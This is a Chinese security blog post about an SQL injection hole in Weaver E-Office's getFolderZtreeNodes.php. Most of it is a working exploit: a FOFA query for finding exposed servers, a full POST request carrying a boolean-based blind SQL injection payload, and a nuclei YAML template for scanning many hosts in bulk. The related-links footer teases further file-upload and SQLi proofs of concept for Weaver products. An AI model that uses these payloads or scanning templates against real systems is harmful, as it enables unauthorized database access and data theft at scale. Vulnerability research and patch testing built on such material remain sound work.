首页 > 数据库 >泛微E-office getFolderZtreeNodes SQL注入漏洞

泛微E-office getFolderZtreeNodes SQL注入漏洞

时间:2023-09-04 16:26:00浏览次数:51  
标签:office getFolderZtreeNodes 漏洞 537.36 SQL 泛微 SELECT

漏洞简介

getFolderZtreeNodes.php存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息

漏洞复现

fofa语法:app="泛微-EOffice"
登录页面如下:

POC:

POST /general/system/file_folder/purview_new/getFolderZtreeNodes.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 613

id=(SELECT (CASE WHEN (length(database())>7) THEN 1 ELSE (SELECT 9469 UNION SELECT 1668) END))&lv=0&n=&param=eyJmaWxlU29ydCI6bnVsbCwicm9vdCI6eyJuYW1lIjpudWxsLCJjaGVjayI6dHJ1ZSwidXJsIjoiL2dlbmVyYWwvZmlsZV9mb2xkZXIvZmlsZV9uZXcvZmlsZWxpc3QucGhwP1NPUlRfSUQ9MCZGSUxFX1NPUlQ9IiwidGFyZ2V0IjoiZmlsZV9tYWluIiwicmlnaHRDbGljayI6ZmFsc2V9LCJub2RlIjp7InJpZ2h0Q2xpY2siOmZhbHNlLCJ1cmwiOiIvZ2VuZXJhbC9maWxlX2ZvbGRlci9maWxlX25ldy9maWxlbGlzdC5waHAiLCJ0YXJnZXQiOiJmaWxlX21haW4iLCJsb2FkQWxsIjpmYWxzZX0sInNlbGVjdCI6eyJzb3J0aWQiOm51bGwsInNvcnRuYW1lIjpudWxsLCJnZXR3aGF0IjpudWxsLCJmaWxlc29ydCI6bnVsbCwiY2xpY2tGdW4iOiJzZWxlY3RfZm9sZGVyIn19

通过修改length(database())<0中的数字,如果数据库名长度小于0,条件为假,响应包中出现sql语句报错;数据库长度大于0,条件为真,响应包中未出现sql语句报错

nuclei批量yaml文件

id: eoffice_getFolderZtreeNodes_sqli
info:
  name: 泛微getFolderZtreeNodes 存在SQL注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |-
        POST /general/system/file_folder/purview_new/getFolderZtreeNodes.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 613

        id=(SELECT (CASE WHEN (length(database())<0) THEN 1 ELSE (SELECT 9469 UNION SELECT 1668) END))&lv=0&n=&param=eyJmaWxlU29ydCI6bnVsbCwicm9vdCI6eyJuYW1lIjpudWxsLCJjaGVjayI6dHJ1ZSwidXJsIjoiL2dlbmVyYWwvZmlsZV9mb2xkZXIvZmlsZV9uZXcvZmlsZWxpc3QucGhwP1NPUlRfSUQ9MCZGSUxFX1NPUlQ9IiwidGFyZ2V0IjoiZmlsZV9tYWluIiwicmlnaHRDbGljayI6ZmFsc2V9LCJub2RlIjp7InJpZ2h0Q2xpY2siOmZhbHNlLCJ1cmwiOiIvZ2VuZXJhbC9maWxlX2ZvbGRlci9maWxlX25ldy9maWxlbGlzdC5waHAiLCJ0YXJnZXQiOiJmaWxlX21haW4iLCJsb2FkQWxsIjpmYWxzZX0sInNlbGVjdCI6eyJzb3J0aWQiOm51bGwsInNvcnRuYW1lIjpudWxsLCJnZXR3aGF0IjpudWxsLCJmaWxlc29ydCI6bnVsbCwiY2xpY2tGdW4iOiJzZWxlY3RfZm9sZGVyIn19
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - folder.class.php
      - type: word
        part: header
        words:
          - '302'

标签:office,getFolderZtreeNodes,漏洞,537.36,SQL,泛微,SELECT
From: https://www.cnblogs.com/pursue-security/p/17677375.html

相关文章

  • 泛微E-Office init.php文件上传漏洞
    漏洞简介泛微E-Officeinit.php文件存在任意文件上传漏洞,攻击者可以通过该漏洞直接获取网站权限。漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:POST/E-mobile/App/init.phpHTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/53......
  • 业务逻辑sql,一对多,取多中的一条信息(特定条件)
    SELECTa.idprojectId,a.`code`,a.`name`,a.ext_string_value_26priority,a.ext_string_value_9bearerDepartment,a.create_timecreateTime,a.ext_string_value_6functionary,a.`ext_st......
  • 泛微E-Office UploadFile.php任意文件上传漏洞 CNVD-2021-49104
    漏洞描述在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件,攻击者可以通过该漏洞直接获取网站权限漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:POST/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=H......
  • 泛微E-cology9 browser.jsp SQL注入漏洞QVD-2023-5012
    漏洞简介泛微e-cology9存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。影响版本泛微e-cologyV9<10.56漏洞复现fofa语法:app="泛微-协同商务系统"登录页面:POC:POST/mobile/%20/plugin/browser.jspHTTP/1.1Host:115.236.39.115:8088User-Agent:Mozilla/5.0(W......
  • MySQL的Json类型个人用法详解
    ​ 前言虽然MySQL很早就添加了Json类型,但是在业务开发过程中还是很少设计带这种类型的表。少不代表没有,当真正要对Json类型进行特定查询,修改,插入和优化等操作时,却感觉一下子想不起那些函数怎么使用。比如把json里的某个键和值作为SQL条件,修改某个键下的子键的值,其中可能会遇到......
  • SqlServer2000数据库迁移"用户已存在"问题解决
    作者:fbysss关键字:sqlserver数据库用户,关联缺失背景:数据库从另外一台服务器备份之后还原,发现程序中登录数据库失败。排查:发现"安全性"->"登录"中的数据库用户与数据库没有关联,但是手工再关联,却报出错误21002:[sql-dmo]用户***已经存在的异常信息。而删除该数据库用户也无法进行,因为......
  • sql server2005 jdbc解决自动自动增长列统一处理问题纪实
    作者fbysss关键字:自动增长列,jdbc,sqlserver2005背景:系统要支持多种数据库,统一insert的时候获取自动增长列的处理方式问题1:insert+select方案sqlserver2000可以使用insertSql +SELECT@@IDENTITYAS'Identity'的方式来获得,但是mysql则只能使用executeUpdate(insertSql);execut......
  • SQL备忘-基本控制语句复习及@@ROWCOUNT陷阱纪实
    作者fbysss关键字:SQL语句      好久不写复杂的sql语句,以至于很多东西都忘记。以至于写出@name="sss"来(应该使用单引号)还是写日志好,一些小的知识点很快可以查到,所以有机会就赶紧贴上来,顺便给需要的人参考。下面这段很简单,但是很容易陷入@@rowcount的“想当然”陷阱。declare......
  • 泛微E-cology HrmCareerApplyPerView.jspSQL注入漏洞
    漏洞简介泛微OAE-CologyHrmCareerApplyPerView.jsp文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件影响版本泛微OAE-Cologyv8.0漏洞复现fofa语法:app="泛微-协同办公OA"登录页面如下:POC/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20......
  • 泛微E-cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
    漏洞简介泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。漏洞影响泛微e-cology8.0漏洞复现fofa语法:app="泛微-协同办公OA"登录页面如下:POC:/upgrade/detail.jsp/log......